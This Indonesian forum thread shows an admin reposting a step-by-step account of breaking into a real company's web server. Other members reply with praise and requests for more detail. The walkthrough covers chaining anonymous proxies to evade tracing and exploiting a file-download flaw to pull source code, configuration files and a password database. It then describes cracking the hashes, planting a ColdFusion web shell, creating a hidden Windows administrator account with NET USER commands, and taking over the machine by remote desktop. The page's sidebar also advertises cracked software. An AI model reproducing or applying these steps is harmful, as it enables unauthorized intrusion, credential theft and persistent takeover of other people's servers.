mig33amuntai.forummotion.com
mig33amuntai.forummotion.com
mig33amuntai.forummotion.com
Would you like to react to this message? Create an account in a few clicks or log in to continue.



 
PortalHomeSearchLatest imagesRegisterLog in
..::WELCOME TO AMUNTAI MIG33 COMMUNITY::..
Search
 
 

Display results as :
 
Rechercher Advanced Search
CLOCK
STATISTIK
widgeo.net
Latest topics
» IBM AMOS 26 Crack Full Version
BELAJAR HACK SITUS I_icon_minitimeTue Aug 01, 2023 7:39 am by

» Portable STATA 18 Crack Full Version
BELAJAR HACK SITUS I_icon_minitimeThu May 11, 2023 3:09 am by

» NVivo 12 Crack Full version
BELAJAR HACK SITUS I_icon_minitimeSun Jan 29, 2023 7:31 pm by

» Tutorial Difference In difference (DID (Diff-in-Diff) With Eviews 13
BELAJAR HACK SITUS I_icon_minitimeWed Nov 02, 2022 4:17 pm by

» Online Workshop Smart PLS Minggu, 01 Oktober 2022
BELAJAR HACK SITUS I_icon_minitimeFri Sep 16, 2022 9:23 pm by

» Multy Mig Fighterx (cracked)
BELAJAR HACK SITUS I_icon_minitimeWed Jan 21, 2015 1:24 am by

» GCD FULL HACKED
BELAJAR HACK SITUS I_icon_minitimeWed Dec 03, 2014 2:40 pm by

» Ultimate Mig Destroyer (UMD) Cracked [free] Version
BELAJAR HACK SITUS I_icon_minitimeSun Sep 21, 2014 2:38 pm by

» Mig33Bot v6.1.6
BELAJAR HACK SITUS I_icon_minitimeSat Sep 20, 2014 9:11 pm by

Top posters
amuntai
BELAJAR HACK SITUS I_vote_lcapBELAJAR HACK SITUS I_voting_barBELAJAR HACK SITUS I_vote_rcap 
oded
BELAJAR HACK SITUS I_vote_lcapBELAJAR HACK SITUS I_voting_barBELAJAR HACK SITUS I_vote_rcap 
satriapegasus
BELAJAR HACK SITUS I_vote_lcapBELAJAR HACK SITUS I_voting_barBELAJAR HACK SITUS I_vote_rcap 
adol
BELAJAR HACK SITUS I_vote_lcapBELAJAR HACK SITUS I_voting_barBELAJAR HACK SITUS I_vote_rcap 
iiccall
BELAJAR HACK SITUS I_vote_lcapBELAJAR HACK SITUS I_voting_barBELAJAR HACK SITUS I_vote_rcap 
phd
BELAJAR HACK SITUS I_vote_lcapBELAJAR HACK SITUS I_voting_barBELAJAR HACK SITUS I_vote_rcap 
annai
BELAJAR HACK SITUS I_vote_lcapBELAJAR HACK SITUS I_voting_barBELAJAR HACK SITUS I_vote_rcap 
ipin06
BELAJAR HACK SITUS I_vote_lcapBELAJAR HACK SITUS I_voting_barBELAJAR HACK SITUS I_vote_rcap 
vebrianto
BELAJAR HACK SITUS I_vote_lcapBELAJAR HACK SITUS I_voting_barBELAJAR HACK SITUS I_vote_rcap 
ugz
BELAJAR HACK SITUS I_vote_lcapBELAJAR HACK SITUS I_voting_barBELAJAR HACK SITUS I_vote_rcap 
D-NET RADIO STREAMING
Browser not supported
April 2024
MonTueWedThuFriSatSun
1234567
891011121314
15161718192021
22232425262728
2930     
CalendarCalendar

Share  | 
 

 BELAJAR HACK SITUS

View previous topic View next topic Go down 
Author Message
amuntai
ADMIN
ADMIN
amuntai

Jumlah posting : 1244
Points : 3135
Reputation : 125
Join date : 2009-12-05
Age : 36
Lokasi : Kalimantan Selatan

BELAJAR HACK SITUS Vide
PostSubject: BELAJAR HACK SITUS   BELAJAR HACK SITUS I_icon_minitimeTue Mar 16, 2010 8:39 am

BELAJAR HACK SITUS

Hehehehe ngomong2
dulu
forum cianjur33.forumotion.com juga sempet ada yang hack...!!!
ketauan
cuma ip nya
aja tapi orangnya belum kertemu

Studi Kasus
kelemahan Server
Situs [You must be registered and logged in to see this link.]
Oleh
Satria Kelana
Published:
Oktober 29, 2007
Print

Situs [You must be registered and logged in to see this link.]
secara
sekilas terlihat tidak memiliki bug yang cukup berarti untuk
dieksploitasi
oleh hacker. Namun ternyata masih terdapat celah yang
bisa
dieksploitasi.
Berikut ini langkah-langkah yang dilakukan untuk
membobol
server
ini.

1. Persiapan hacking
2.
Pemeriksaan
bug
3. Mendownload source code dan file konfigurasi
4.

Mengupload file explorer dan windows shell command interface
5.
Mengambil-alih
server


Saya akan menjelaskan
langkah-langkah di atas
satu per satu.

1.
Persiapan hacking

Sebelumnya
Anda harus memiliki list proxy
server yang mendukung
proxy-chain
untuk menghindari pelacakan. Anda
harus mengkoneksikan
sekurang-kurangnya
2 anonymous proxy server di 2
negara yang berbeda.
Anda dengan
mudah mendapatkan proxy server di
search engine Google.
Namun
bila Anda menemukan lebih banyak
transparant proxy server,
gunakan
3 transparant proxy server yang
mendukung chain, dan rutekan
koneksinya
melintasi beberapa negara,
misalnya: Brazil - China - India,
sehingga
bila dilacak oleh
"Pengejar Hacker" maka mereka hanya akan
melacak
koneksi dari ISP
Indonesia ke China.

Pada sistem operasi
windows, anda dapat
menggunakan software mungil
bouncer.exe untuk
melakukan proxy-chain
melalui parameter tunneling.
Contoh dengan
IP lokal 192.168.0.5:

bouncer
--bind 192.168.0.5 --port 8881
--tunnel 82.0.0.1:8080 --destination
221.0.0.1:8080
bouncer
--bind 192.168.0.5 --port 8882 --tunnel
192.168.0.5:8881
--destination 200.0.0.1:3128

Pada contoh di
atas, bila kita
mengeset proxy pada internet browser
menjadi
192.168.0.5:8882
maka koneksi kita akan dirutekan melalui proxy
server:

82.0.0.1:8080 -> 221.0.0.1:8080 -> 200.0.0.1:3128 -> [You must be registered and logged in to see this link.]

Karena
kita menggunakan transparant proxy server maka IP 221.0.0.1 juga
akan
terlacak. Namun ini tidak masalah karena kita sebenarnya
terkoneksi
dari
proxy server 82.0.0.1.

2. Pemeriksaan bug
Pemeriksaan
dilakukan secara trial and error pada setiap parameter yang
diperkirakan
mengandung bug. Pada kasus ini terdapat bug pada module
downloading
file
untuk mendownload file .mp3 dengan URL:

[You must be registered and logged in to see this link.]

Dari
parameter di atas terlihat file dl_comm.cfm terletak pada folder
download.
Sekarang kita coba secara langsung mengeksekusi pada file
.cfm
tersebut
dan menyisipkan parameter querystring cfile untuk
mendapatkan

source codenya.

[You must be registered and logged in to see this link.]

Ternyata
hasilnya adalah file source code dl_comm.cfm. Berikut ini adalah bagian
penting dari source code tersebut.





Dari source
code ini kita bisa menemukan bahwa terdapat parameter
querystring
abs_dir
dan cfile yang bisa mengarahkan kita untuk
mendownload file
apa
saja dari harddisk server.


3.
Mendownload
source code dan file konfigurasi


Kita jejaki
setiap
link di dalam source code-nya, kemudian kita download. Misalnya:

[You must be registered and logged in to see this link.]

Dari
kumpulan file inilah kemudian kita mendapatkan bocoran source code
situs
[You must be registered and logged in to see this link.] yang telah diberitakan
sebelumnya
di situs ini.

Selanjutnya kita download file
konfigurasi web
servernya dengan cara berikut:

File konfigurasi
IIS:
[You must be registered and logged in to see this link.]

File
konfigurasi CFM:
[You must be registered and logged in to see this link.]

File
History Internet Explorer untuk Administrator
[You must be registered and logged in to see this link.]
and Settings\Administrator\Local Settings\History\History.IE5\index.dat

Dari
file Metabase.xml kita dapat mengetahui bahwa terdapat beberapa situs
web
yang hosting di server ini.
- [You must be registered and logged in to see this link.] yang terletak di
E:\webuser\web\powerofpaytv.com
-
[You must be registered and logged in to see this link.]
yang terletak di
E:\webuser\web\jedrealty.com
- [You must be registered and logged in to see this link.]
yang terletak di E:\webuser\web\rasasayang.com.my

Dari file
index.dat
kita dapat mengetahui bahwa Administrator melakukan
proses
administrasi
upload dan download file dengan mengunjungi [You must be registered and logged in to see this link.]

Dari
file neo-query.xml kita dapat mengetahui file database pengguna
terletak
di E:\webuser\web\powerofpaytv.com\_db\dcm_casbaa_db. mdb yang
dapat
kita download melalui:
[You must be registered and logged in to see this link.]

Dari
file dcm_casbaa_db.mdb ini kita memperoleh user-id dan password
dalam
bentuk MD5 hash. Dengan menggunakan software decryptor misalnya
Cain
& Abel kita dapat mendecyrpt passwordnya.


4. Mengupload file explorer dan windows shell command
interface

Dari
[You must be registered and logged in to see this link.]
kita
dapat
mengupload file explorer misalnya ASF File Explorer yang
dibuat

oleh Nahuel Foronda and Laura Arguello. Dengan ASF File
Explorer,
kita
dapat membrowse file di harddisk secara lebih leluasa,
serta
meng-upload,
download dan delete file.

Untuk windows shell
command
interface, kita buatkan file.CFM dengan script berikut:




arguments="#strArg#"
timeout="5">






#Replace(Replace(Replace('#cmdResult#',
'<', '<', 'all'), '>', '>', 'all'), Chr(10), '
',
'all')#



5. Mengambil-alih
server

Kita dapat
menambahkan user login windows (group
administrator) dengan
mengeksekusi
perintah berikut pada windows
shell command interface.

NET
USER mbahjambon mypassword /ADD
/ACTIVE:YES /EXPIRES:NEVER
/PASSWORDCHG:YES
NET LOCALGROUP
Administrators mbahjambon /ADD

Dengan
menggunakan Windows Remote
Desktop kita dapat mengambil alih
servernya
(IP 202.157.176.17).
Koneksinya tetap dilakukan melalui proxy
tunneling
seperti contoh
berikut:

bouncer --bind 192.168.0.5 --port
8883 --tunnel
82.0.0.1:8080 --destination 221.0.0.1:8080
bouncer
--bind 192.168.0.5
--port 8884 --tunnel 192.168.0.5:8883
--destination 202.157.176.17:3389

sehingga
kita dapat
meremote server melalui Remote Desktop pada alamat:
192.168.0.5:8884

Demikian
cara yang digunakan untuk membobol
server situs [You must be registered and logged in to see this link.]
Dengan membaca tulisan
ini, mudah-mudahan para pembaca dapat
menghindari bug sejenis pada
server Anda.

digunakan
dengan bijak...
jangan
di salah gunakan..
salam buat para
hacker [You must be registered and logged in to see this image.]
Back to top Go down
http://amuntai.co.tv
satriapegasus
TECHNICIANS
TECHNICIANS
satriapegasus

Jumlah posting : 235
Points : 284
Reputation : 6
Join date : 2010-03-05
Age : 42
Lokasi : surakarta hadiningrat (solo)

BELAJAR HACK SITUS Vide
PostSubject: Re: BELAJAR HACK SITUS   BELAJAR HACK SITUS I_icon_minitimeFri Mar 19, 2010 12:25 pm

dosa lhooooo....... [You must be registered and logged in to see this image.]


tapi ga smua programer mampu melakukannya juga.....hehehhe.... [You must be registered and logged in to see this image.]
[You must be registered and logged in to see this image.]
Back to top Go down
http://www.cyber-kicker.forumsmotion.com
fadhil
NEW MEMBER
NEW MEMBER
fadhil

Jumlah posting : 1
Points : 1
Reputation : 0
Join date : 2010-06-14
Age : 31

BELAJAR HACK SITUS Vide
PostSubject: Re: BELAJAR HACK SITUS   BELAJAR HACK SITUS I_icon_minitimeMon Jun 14, 2010 3:23 am

KK bisa ajarain saya biar saya jadi hacker.....tolong ajarin....apakah saya bisa menghubungi anda............
Back to top Go down
amuntai
ADMIN
ADMIN
amuntai

Jumlah posting : 1244
Points : 3135
Reputation : 125
Join date : 2009-12-05
Age : 36
Lokasi : Kalimantan Selatan

BELAJAR HACK SITUS Vide
PostSubject: Re: BELAJAR HACK SITUS   BELAJAR HACK SITUS I_icon_minitimeMon Jun 14, 2010 3:48 am

whahahahha saya cuman tukang copas bukan hacker [You must be registered and logged in to see this image.]
Back to top Go down
http://amuntai.co.tv
toshiba
GOLDEN MEMBER
GOLDEN MEMBER
toshiba

Jumlah posting : 31
Points : 32
Reputation : 1
Join date : 2010-09-28
Age : 64

BELAJAR HACK SITUS Vide
PostSubject: Re: BELAJAR HACK SITUS   BELAJAR HACK SITUS I_icon_minitimeSun Oct 10, 2010 1:56 am

mantab bos elmunya....lanjutkan
Back to top Go down
erwindelta
NEW MEMBER
NEW MEMBER
erwindelta

Jumlah posting : 2
Points : 2
Reputation : 0
Join date : 2011-08-25
Age : 31

BELAJAR HACK SITUS Vide
PostSubject: Re: BELAJAR HACK SITUS   BELAJAR HACK SITUS I_icon_minitimeThu Aug 25, 2011 7:10 am

gan bisa gk tutornya agak rinci lg ???????? bilut
Back to top Go down
Ryujin
NEW MEMBER
NEW MEMBER
Ryujin

Jumlah posting : 1
Points : 1
Reputation : 0
Join date : 2012-06-02
Age : 32

BELAJAR HACK SITUS Vide
PostSubject: Re: BELAJAR HACK SITUS   BELAJAR HACK SITUS I_icon_minitimeSat Jun 02, 2012 1:10 pm

download apps bouncer.exe ny di mana massbroo??? mikir
Back to top Go down
damiandavid245
NEW MEMBER
NEW MEMBER
damiandavid245

Jumlah posting : 4
Points : 4
Reputation : 0
Join date : 2012-10-01
Age : 36

BELAJAR HACK SITUS Vide
PostSubject: Re: BELAJAR HACK SITUS   BELAJAR HACK SITUS I_icon_minitimeMon Oct 01, 2012 2:13 pm

thank gan
Back to top Go down
Sponsored content




BELAJAR HACK SITUS Vide
PostSubject: Re: BELAJAR HACK SITUS   BELAJAR HACK SITUS I_icon_minitime

Back to top Go down
 

BELAJAR HACK SITUS

View previous topic View next topic Back to top 
Page 1 of 1

Permissions in this forum: You cannot reply to topics in this forum
mig33amuntai.forummotion.com :: .:: COMPUTER ::. :: Tips & Trik -
Free forum | ©phpBB | Free forum support | Report an abuse | Forumotion.com